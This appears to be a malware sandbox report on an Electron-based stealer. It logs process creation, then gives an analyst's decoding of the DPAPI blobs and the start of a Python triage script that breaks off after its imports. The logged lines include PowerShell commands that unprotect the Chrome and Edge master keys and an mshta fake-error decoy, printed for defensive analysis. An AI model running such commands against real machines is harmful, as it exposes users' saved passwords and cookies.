Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d12core.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxilconv.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: d3dscache.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: twinapi.appcore.dll
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal60.adwa.spyw.winEXE@37/111@4/4
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Setup
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB68.tmp
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe "C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" Jump to behavior
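Reading the process tree above: the Setup.exe children started with --type=gpu-process and --type=utility --utility-sub-type=network.mojom.NetworkService are ordinary Chromium child processes of an Electron application. The anomalies are the cmd.exe children the main process spawns: tasklist, two PowerShell calls to [System.Security.Cryptography.ProtectedData]::Unprotect on a literal byte array, and an mshta javascript: one-liner that pops a fake "error occurred while downloading files" dialog so the user writes the installer off as broken. Each byte array is a DPAPI CRYPTPROTECT blob: version 1, the fixed provider GUID {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} (208,140,157,223,1,21,...), the user's master-key GUID {1f96f985-85d7-4a7a-a053-c8e755c25d39} (133,249,150,31,...), a 28- or 30-byte UTF-16LE description that decodes to "Google Chrome" and "Microsoft Edge", then CALG_AES_256 (16,102,0,0), a 32-byte salt, CALG_SHA_512 (14,128,0,0), a 48-byte ciphertext (a padded 32-byte key) and a 64-byte HMAC. That is the os_crypt encrypted_key a Chromium browser keeps in its Local State file with the "DPAPI" prefix stripped. Unprotect is called with $null entropy and 'CurrentUser' scope, so any process running as the logged-on user can recover the key that protects the browser's saved passwords and cookies, and routing the call through PowerShell puts the CryptUnprotectData call in a signed Microsoft binary rather than in the sample.

The Python below is an added example, not part of the sandbox report. It pulls the inline blob out of such a command line, validates it as a DPAPI blob, decodes the description and master-key GUID, and also flags the mshta decoy. The sample command lines are constructed with a fixture blob (header fields only, zeroed key material); the master-key GUID in the fixture is the one decoded above.

```python
"""Triage of process-creation command lines of the kind listed above.

Added example; not part of the sandbox report. The byte array that Setup.exe
hands to PowerShell is a DPAPI CRYPTPROTECT blob: version 1, the fixed DPAPI
provider GUID, the user's master-key GUID, then a UTF-16LE description. Parsing
those fields turns a string match on 'ProtectedData' into a finding that names
the protected secret and the master-key file involved. Sample command lines are
constructed here with a fixture blob (real key material is not needed).
"""
import re
import struct
import uuid

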